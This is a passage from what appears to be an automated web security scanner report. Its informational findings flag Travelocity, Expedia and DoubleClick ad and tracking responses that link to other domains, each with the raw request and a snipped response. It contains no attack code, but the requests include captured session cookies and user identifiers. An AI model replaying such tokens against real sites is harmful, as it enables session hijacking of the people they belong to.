19.122. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/roam','waitscreen','menubar,toolbar,location,status,scrollbars,resizable,width=400,height=400,left=100,top=300'); return false;"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110802_roaminggnome_300x250.jpg" galleryimg="no" border="0"></a>
...[SNIP]...

19.123. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/roam','waitscreen','menubar,toolbar,location,status,scrollbars,resizable,width=400,height=400,left=100,top=300'); return false;"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110802_roaminggnome_300x250.jpg" galleryimg="no" border="0"></a>
...[SNIP]...

19.124. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...
68-1317600484&Redirect=http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|4676|hotels_main,00.html?WA1=03031&WA2=ent&WA3=342&WA4=0930_homepage_uscities_342x296jpg&WA5=IM&WA7=16427" target="_top"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/0930_homepage_uscities_342x296.jpg" alt="U.S. Hotels" width="342" height="296" border="0">
<img src="http://travel.travelocity.com/___waseq.img?WA1=03031&WA2=ent&WA3=342&WA4=0930_homepage_uscities_342x296jpg&WA5=IM&WA7=16427" width="1" height="1" border="0">
...[SNIP]...

19.125. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/HSDirect.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Hotels/Delivery/HSDirect.aspx?thrn=1299437744&D=BOS&CI=20111004&CO=20111007&Eapid=0000&SID=1&RID=178239&pr=1&pa=1&Cr=&H=4215|15861|23415|1680030|2800816|4443|1450057|12244|17845|16067|15159|10391|560932|22961|20351|16680|903185|151201|16079|293|119162|980972|26283|2311712|22512&LAP=429.0|339.15|289.0|432.33|308.54|383.1|359.1|349.0|401.33|412.33|409.4|259.0|221.1|345.67|72.1|349.0|414.0|379.95|359.0|127.99|436.33|419.0|335.67|445.67|399.0&LTP=1287.00|1017.45|867.00|1297.00|925.60|1149.30|1077.30|1047.00|1204.00|1237.00|1228.21|777.00|663.30|1037.00|216.30|1047.00|1242.00|1139.85|1077.00|383.97|1309.00|1257.00|1007.00|1337.00|1197.00&HAP=449.00|509.15|289.00|432.33|388.54|401.10|407.33|399.00|437.33|462.33|429.91|259.00|221.10|345.67|72.10|349.00|614.00|429.95|389.00|159.99|436.33|419.00|335.67|525.67|459.00&HTP=1347.00|1527.45|867.00|1297.00|1165.60|1203.30|1222.00|1197.00|1312.00|1387.00|1289.74|777.00|663.30|1037.00|216.30|1047.00|1842.00|1289.85|1167.00|479.97|1309.00|1257.00|1007.00|1577.00|1377.00&Str=0&Si=0&vers=en&tid=1 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:10:59 GMT; path=/
Set-Cookie: expEAPID=0000; expires=Tue, 04-Oct-2011 00:10:59 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQH2seBJxXACZ7631o5Ado1kVl48f7csfT3c6loQl0QaGr+exqsZE8q6RN0qJ9Kmc82VZVBumioxbKldNopV86WTUYH0n5v3Toyx0+FBPR+W9VyVapTaQWQlqvxPP7vS71A=; expires=Thu, 02-Oct-2014 00:10:59 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close

var gem3442live=document.getElementById("th_fee");var th_StaticStart=new Date();var th_StaticEnd=new Date();var th_ScrapeStart=new Date();var th_ScrapeEnd=new Date();var th_ScriptCounter=1;var th_QS=d
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"8373":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.2;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"5306":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.3;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"22600":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.4;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"20303":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.5;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;default:thpx=""}return thpx}catch(er){return""}}function thNectar(hotels,s1,s2){var headline=s1;var details=s2;function insert(elParent,headline,details){var elNew=document.createElement("div")
...[SNIP]...

19.126. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=1686084058;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=6000101;u4=20111009%7C20111016;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=16067%7C15159%7C2558%7C10391%7C903185;u14=441.86%7C416.89%7C456.43%7C118.15%7C444.0;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:38:37 GMT
Expires: Mon, 03 Oct 2011 00:38:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 751
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"
src="http://tags.bluekai.com/site/2625?ret=html&phint=u1=Hotel&phint=u2=6000101&phint=u3=&phint=u4=20111009%7C20111016&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=16067%7C15159%7C2558%7C10391%7C903185&phint=u14=441.86%7C416.89%7C456.43%7C118.15%7C444.0&phint=u16=USD&phint=u20=">
</IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">

</script>
...[SNIP]...

19.127. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111004%7C20111007;u2=178239;u6=1;u7=1%7C0;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u11=35;u13=4215;u14=429;u16=USD;ord=7232943603303.283? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:14:11 GMT
Expires: Mon, 03 Oct 2011 00:14:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 661
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111004%7C20111007&phint=u6=1&phint=u7=1%7C0&phint=u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers&phint=u11=35&phint=u13=4215&phint=u14=429&phint=u15="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">

</script>
...[SNIP]...

19.128. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:09:20 GMT
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 3041
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" /><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://px.admonkey.dapper.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src='http://a.tribalfusion.com/i.cid?c=362743&d=30&page=landingPage' width='1' height='1' border='0'>//Search/Listing
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032220788/?label=ZkuQCOTitgEQ9OCZ7AM&amp;guid=ON&amp;script=0"/><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72833&pixelID=72834&pixelID=72835&pixelID=72836&pixelID=72837&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...

19.129. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=11678075? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 01:02:16 GMT
Expires: Mon, 03 Oct 2011 01:02:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 3041
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" /><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://px.admonkey.dapper.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src='http://a.tribalfusion.com/i.cid?c=362743&d=30&page=landingPage' width='1' height='1' border='0'>//Search/Listing
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1401516" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032220788/?label=ZkuQCOTitgEQ9OCZ7AM&amp;guid=ON&amp;script=0"/><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72833&pixelID=72834&pixelID=72835&pixelID=72836&pixelID=72837&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...

19.130. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston%20Omni%20Parker%20House%20Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=71228260? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:28:21 GMT
Expires: Mon, 03 Oct 2011 00:28:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2049
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" />//Hotel Property
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1401516" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72838&pixelID=72839&pixelID=72840&pixelID=72841&pixelID=72842&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...

19.131. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /activityi;src=2588783;type=nausc547;cat=nausi164;u=CCF4A420AF8B480F8413EFB42E880287;u16=USD;u13=4215;u14=429;u11=35;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u7=1%7C0;u6=1;u4=20111004%7C20111007;u1=Hotel;u2=178239;ord=691577950492.5012? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:14:14 GMT
Expires: Mon, 03 Oct 2011 00:14:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2292
X-XSS-Protection: 1; mode=block

